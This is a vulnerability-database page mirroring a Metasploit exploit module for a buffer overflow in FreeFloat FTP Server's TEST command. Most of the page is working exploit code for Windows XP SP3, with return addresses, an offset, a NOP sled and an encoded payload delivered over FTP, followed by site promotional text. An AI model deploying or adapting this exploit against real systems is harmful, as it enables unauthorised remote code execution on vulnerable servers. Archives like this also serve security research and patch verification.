Lucene search
K

FreeFloat FTP Server TEST Buffer Overflow (MSF)

🗓️ 15 Mar 2012 00:00:00Reported by KaHPeSeSeType 
zdt
 zdt
🔗 0day.today👁 17 Views

FreeFloat FTP Server Buffer Overflow exploi

Code
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
    include Msf::Exploit::Remote::Ftp
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'FreeFloat FTP Server TEST Buffer Overflow',
            'Description'    => %q{
                        This module exploits a FreeFloat FTP Server Buffer Overflow
                        found in the TEST command.
            },
            'Author'         => [
                        'KaHPeSeSe'     #Found bug and wrote the exploit
                    ],
            'License'        => MSF_LICENSE,
            'Version'        => "$Revision: 14774 $",
            'References'     =>
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/17546' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17548' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17550' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'BadChars' => "\x00\x0a\x0d",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'PERFECT XP PC1 / SP3 # jmp esp',
                        {
                            'Ret' => 0x7C86467B, # findjmp KERNEL32.DLL ESP 0x7C86467B jmp ESP
                            'Offset' => 246
                        }
                    ],
					
					[ 'PERFECT XP PC1 / SP3 # push esp - ret',
                        {
                            'Ret' => 0x7C909DB0, # findjmp KERNEL32.DLL ESP 0x7C909DB0 push esp - ret
                            'Offset' => 246
                        }
                    ],
                ],
            'DisclosureDate' => 'March 13 2012',
            'DefaultTarget' => 0))
			
			register_options(
			[
				Opt::RPORT(21),
				OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'test']),
				OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'test'])
			], self.class )
	end
	
    def exploit
        connect_login
        print_status("Trying target #{target.name}...")
        buf = make_nops(target['Offset']) + [target.ret].pack('V')
        buf << make_nops(20)
        buf << payload.encoded
        send_cmd( ['TEST', buf] , false )   #TEST command
        handler
        disconnect
    end
end



#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation